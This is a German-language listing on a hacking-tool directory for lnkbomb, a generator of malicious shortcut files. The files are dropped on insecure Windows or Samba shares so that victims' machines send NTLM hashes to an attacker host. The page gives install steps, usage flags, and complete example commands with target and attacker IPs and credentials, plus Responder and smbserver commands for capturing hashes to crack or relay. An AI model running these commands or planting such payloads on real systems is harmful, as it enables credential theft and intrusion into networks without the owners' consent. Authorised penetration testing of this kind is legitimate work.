Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
lnkbomb — Bösartiger Verknüpfungsgenerator zum Sammeln von NTLM-Hashes aus unsicheren Dateifreigaben. | Kitploit
Tools/GitHubGitHub/dievus/lnkbomb
PasswortangriffeExploitationLaterale BewegungInformationsbeschaffungPenetrationstestsRed TeamingArchived
GitHubdievus/lnkbomb

lnkbomb

Bösartiger Verknüpfungsgenerator zum Sammeln von NTLM-Hashes aus unsicheren Dateifreigaben.

Repository anzeigen
363627vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Lnkbomb

ko-fi

Lnkbomb wird verwendet, um bösartige Verknüpfungsdateien auf unsichere Dateifreigaben hochzuladen. Die Schwachstelle besteht darin, dass Windows nach einer Symboldatei sucht, die mit der Verknüpfungsdatei verknüpft werden soll. Diese Symboldatei kann auf den Rechner eines Penetrationstesters umgeleitet werden, auf dem Responder oder smbserver läuft, um NTLMv1- oder NTLMv2-Hashes zu sammeln (abhängig von der Konfiguration des Zielrechners). Der Tester kann dann versuchen, die gesammelten Hashes offline mit einem Tool wie Hashcat zu knacken oder sie an ein Tool wie ntlmrelayx zur weiteren Ausnutzung weiterzuleiten.

Die Nutzlastdatei wird direkt auf die unsichere Datei hochgeladen, die vom Tester in der Befehlszeile angegeben wird. Der Tester gibt auch seine IP-Adresse an, die in die Nutzlast geschrieben wird.

Version 2.0 ist ein kompletter Neubau des Tools und verwendet die pysmb-Bibliothek, die unauthentifizierte und authentifizierte Nutzlastablegungen ermöglicht.

Python-Nutzung

Lnkbomb installieren

Beachten Sie, dass das Projekt unter Windows konsistent funktioniert. Unter Linux kann es zu Problemen kommen.

git clone https://github.com/dievus/lnkbomb.git

Wechseln Sie in das Verzeichnis lnkbomb und führen Sie aus:

python3 lnkbomb.py -h

Dies gibt das Hilfemenü aus, das die folgenden Flags enthält:

-h, --help - Listet die Hilfeoptionen auf

-t, --target - Gibt die IP-Adresse des Ziels an

-a, --attacker - Gibt die IP-Adresse des Angriffsrechners des Testers an

-r, --recover - Wird verwendet, um die Nutzlast zu entfernen, wenn der Test abgeschlossen ist (z.B. -r payloadname.url)

-w, --windows - Neuer Befehl - erforderlich zum Festlegen der entsprechenden Ports für Windows-Freigaben

-l, --linux - Neuer Befehl - erforderlich zum Festlegen der entsprechenden Ports für Linux-Freigaben

-n, --netbios - Neuer Befehl - NetBIOS-Name für die Ziel-Windows-Rechner muss angegeben werden

Beispiele für vollständige Befehle sind:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

Sie müssen ein Tool wie Responder oder smbserver verwenden, um den NTLM-Hash zu erfassen.
responder -I eth0 -dwFP -v

oder

smbserver.py . . -smb2support

Hinweise

Bitte beachten Sie, dass dieses Tool nur für ethisches Hacking und Penetrationstests gedacht ist. Ich billige kein Verhalten, das das Testen von Zielen beinhaltet, für die Sie derzeit keine Testberechtigung haben.

Dieses Tool kann je nach Patch- und Versionsstand des Ziels funktionieren oder auch nicht. Die Benutzererfahrung kann variieren.

Ich weiß, dass es .url-Verknüpfungen und nicht .lnk-Erweiterungen sind. Ich mache es, um Sie zu triggern.

Tool herunterladen